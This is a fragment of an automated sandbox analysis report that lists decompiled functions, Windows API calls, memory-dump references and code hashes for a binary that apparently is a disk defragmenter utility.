                                                                                                                                                                                                                                                                                    • GdipDisposeImage.GDIPLUS(?,00000000,00000000,?,00000000,00000000,?,00000000,?,?,00022009,00022009,?,?,00000000,?), ref: 0040184C
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Gdip$Image$Bitmap$BitsGraphicsPalette$ContextCreateDeleteDisposeDrawFormatFromHeightLockPixelScan0SizeUnlockWidth
                                                                                                                                                                                                                                                                                    • String ID: &$>=
                                                                                                                                                                                                                                                                                    • API String ID: 1279047860-1654677323
                                                                                                                                                                                                                                                                                    • Opcode ID: 34576b26573d57f11954caa93c89dd37f9b4685469006894c39224902bd046cc
                                                                                                                                                                                                                                                                                    • Instruction ID: 8a788743ff85fe53078408617ba339fa43619964413e8471535d34c3641ef31a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34576b26573d57f11954caa93c89dd37f9b4685469006894c39224902bd046cc
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66A175B1E002059FDB14DF95D881AAFB7B5EF88304F14852EE919BB351D738E941CBA8
                                                                                                                                                                                                                                                                                    Function 00453F10 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 201fileCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000000,00000328,?,00000000), ref: 00453F69
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00453FDE
                                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,0009006F,?,00000008,00000000,?,?,00000000), ref: 00454016
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004542BB,?,00000328,00000000,00000000), ref: 00454026
                                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,0009006F,?,00000008,00000000,?,?,00000000), ref: 00454057
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,004542BB,?,00000328), ref: 00454066
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004542BB,?), ref: 00454071
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,004542BB,?,00000328), ref: 004540A7
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,004542BB,?,00000328), ref: 004540D7
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseHandle$ControlDeviceErrorLast$CreateDiskFileFreeSpace
                                                                                                                                                                                                                                                                                    • String ID: C:\$\\.\C:
                                                                                                                                                                                                                                                                                    • API String ID: 4273481478-2866759028
                                                                                                                                                                                                                                                                                    • Opcode ID: 34a5edf5a5058048d5bcc646d78f8edc09eed289d58a581d59fe32c4679fd1ad
                                                                                                                                                                                                                                                                                    • Instruction ID: dcbbcf768856184cb3fb00598b231148ced9fb8d52ef67d3d26bd90cee913ac4
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34a5edf5a5058048d5bcc646d78f8edc09eed289d58a581d59fe32c4679fd1ad
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA616C72608300AFC310DF69D88196BF7E4FFD8711F804A2EF55987291EB759848CB96
                                                                                                                                                                                                                                                                                    Function 00453BD0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 200fileCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00453C29
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00453C9B
                                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,0009006F,?,00000008,00000000,?,?,00000000), ref: 00453CD3
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0045B451), ref: 00453CE3
                                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,0009006F,?,00000008,00000000,?,?,00000000), ref: 00453D14
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00453D23
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00453D2E
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00453D64
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00453D94
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseHandle$ControlDeviceErrorLast$CreateDiskFileFreeSpace
                                                                                                                                                                                                                                                                                    • String ID: C:\$\\.\C:
                                                                                                                                                                                                                                                                                    • API String ID: 4273481478-2866759028
                                                                                                                                                                                                                                                                                    • Opcode ID: f228107344c7f80b23727888f3ccfa0318b04976a6bc281055e8ce1e817f9b41
                                                                                                                                                                                                                                                                                    • Instruction ID: 4e319efc0b140ea32d15ab3920dd7af36ea307e7c4a1d425a09acf6eef36fbe0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f228107344c7f80b23727888f3ccfa0318b04976a6bc281055e8ce1e817f9b41
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9617BB2608300AFC314DF69DC8196BF7F4EFD8751F804A2EF55983251E77599088B9A
                                                                                                                                                                                                                                                                                    Function 00422450 Relevance: 22.7, APIs: 15, Instructions: 169windowtimeCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • IsWindow.USER32(004216E9), ref: 00422459
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 004224AE
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 004224E0
                                                                                                                                                                                                                                                                                    • SetTimer.USER32(004216E9,00000001,000003E8,00000000), ref: 0042250F
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00008004,00000000), ref: 00422558
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00008013,00000000), ref: 0042256D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00008007,00000000), ref: 00422582
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,0000800C,00000000), ref: 00422597
                                                                                                                                                                                                                                                                                    • SetTimer.USER32(004216E9,00000064,00000064,00000000), ref: 004225A3
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Timer$Window
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 389327760-0
                                                                                                                                                                                                                                                                                    • Opcode ID: cefa6ec459511810d8e63057cbdb1cbfc242c52f6ba306b658606e850e188aac
                                                                                                                                                                                                                                                                                    • Instruction ID: a9acc03ce2714c2a1218ac3b36ef8cf29172f02598394e016a1efff805efb144
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cefa6ec459511810d8e63057cbdb1cbfc242c52f6ba306b658606e850e188aac
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C516170390B00ABE624EB75CC82FD6B395AF44B04F40851DB359AB2D1CBF6B8418B48
                                                                                                                                                                                                                                                                                    Function 0040ECF0 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 284windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CopyRect.USER32(?,?), ref: 0040ED30
                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 0040EDD3
                                                                                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040EDF9
                                                                                                                                                                                                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 0040EE67
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0040EE77
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0040EEEE
                                                                                                                                                                                                                                                                                    • CopyRect.USER32(?,?), ref: 0040EF77
                                                                                                                                                                                                                                                                                    • SetRect.USER32(?,?,?,?,?), ref: 0040EFD9
                                                                                                                                                                                                                                                                                    • SetRect.USER32(?,?,?,?,?), ref: 0040F00C
                                                                                                                                                                                                                                                                                    • BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00CC0020), ref: 0040F073
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Rect$CompatibleCopyCreateMessageSend$Bitmap
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2897418849-3916222277
                                                                                                                                                                                                                                                                                    • Opcode ID: 918371f1e30a1611824c586b15503814f3483ab0998594baaaceeb4de49a5514
                                                                                                                                                                                                                                                                                    • Instruction ID: af6e71f7250828e30cc2f680655b832ce69016c02ffdd7eabd90966ae28b2504
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 918371f1e30a1611824c586b15503814f3483ab0998594baaaceeb4de49a5514
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5FC1F3B11083419FC324CF69C984B6BBBE9FF88704F108A2EF59993290DB74E945CB56
                                                                                                                                                                                                                                                                                    Function 00425C00 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 161windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • LoadMenuW.USER32(00000000), ref: 00425C5A
                                                                                                                                                                                                                                                                                    • GetSubMenu.USER32(?,00000003), ref: 00425C85
                                                                                                                                                                                                                                                                                    • CheckMenuItem.USER32(?,00008029,00000008), ref: 00425DAB
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,00000088), ref: 00425DBD
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Menu$CheckItemLoadRectWindow
                                                                                                                                                                                                                                                                                    • String ID: 1003007$1003008$1003009$1003010$3401095$DefragFinish$DiskDefrag
                                                                                                                                                                                                                                                                                    • API String ID: 64815558-1687404023
                                                                                                                                                                                                                                                                                    • Opcode ID: fcaecc0961985140fe5d44f65e3dcc1a4aba1751536b0007d645c60eb4d87030
                                                                                                                                                                                                                                                                                    • Instruction ID: 4418ca87599e6f793fb4d10bf028e48e6936bb9db45e74f47fa123fcf7e21ce3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fcaecc0961985140fe5d44f65e3dcc1a4aba1751536b0007d645c60eb4d87030
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2151CAB1794701BAE350AB609C47FAB7268AB84B14F10C91FB75EB65C0CEFCA405875D
                                                                                                                                                                                                                                                                                    Function 00415960 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 137windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000405,00000001,00000000), ref: 004159AA
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00415AB2
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
